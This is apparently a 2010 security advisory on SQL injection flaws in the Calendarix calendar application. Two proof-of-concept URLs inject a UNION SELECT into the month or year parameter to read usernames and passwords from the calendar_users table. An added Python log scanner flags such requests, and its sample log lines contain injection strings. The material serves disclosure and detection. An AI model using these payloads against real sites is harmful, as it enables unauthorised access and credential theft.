Calendarix Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proofs of concept are available:

http://www.example.com/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23

http://www.example.com/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23
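Both proofs of concept place non-numeric text in the `month` or `year` parameter of `calendar.php`, so access logs can be checked for exactly that. The following is an added example, not code from the advisory or from Calendarix; it assumes both parameters are meant to be short integers or empty, and the log lines are constructed samples in common log format.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: month and year are plain integers of at most four digits, or empty.
NUMERIC = re.compile(r"\d{1,4}")
CHECKED_PARAMS = {"month", "year"}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def bad_params(target):
    """Return sorted names of month/year parameters whose value is not an integer."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/calendar.php"):
        return []
    bad = set()
    # parse_qsl percent-decodes values, so %27 and a literal quote are treated alike,
    # and it yields every occurrence of a repeated parameter, not only the last one.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in CHECKED_PARAMS and value and not NUMERIC.fullmatch(value):
            bad.add(name.lower())
    return sorted(bad)

def scan(log_lines):
    """Return (client address, offending parameter names) for each flagged line."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        bad = bad_params(match.group(1))
        if bad:
            hits.append((line.split(" ", 1)[0], bad))
    return hits

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2010:10:01:02 +0000] "GET /calendar.php?month=3&year=2010 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [12/Mar/2010:10:02:11 +0000] "GET /calendar.php?month=%27%20UNION%20SELECT%201%2C1%20%23 HTTP/1.1" 200 5301',
    '198.51.100.7 - - [12/Mar/2010:10:02:15 +0000] "GET /calendar.php?month=&year=%27%20UNION%20SELECT%201%2C1%20%23 HTTP/1.1" 200 5301',
    '192.0.2.44 - - [12/Mar/2010:10:05:40 +0000] "GET /calendar.php?month=4&month=4%20OR%201%3D1 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [12/Mar/2010:10:06:00 +0000] "GET /index.php?month=abc HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for client, params in scan(SAMPLE_LOG):
        print(client, params)
```

The same allow-list test (integer or empty, nothing else) is the check the application itself should apply to `month` and `year` before they reach a query.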


 

Copyright 2010, SecurityFocus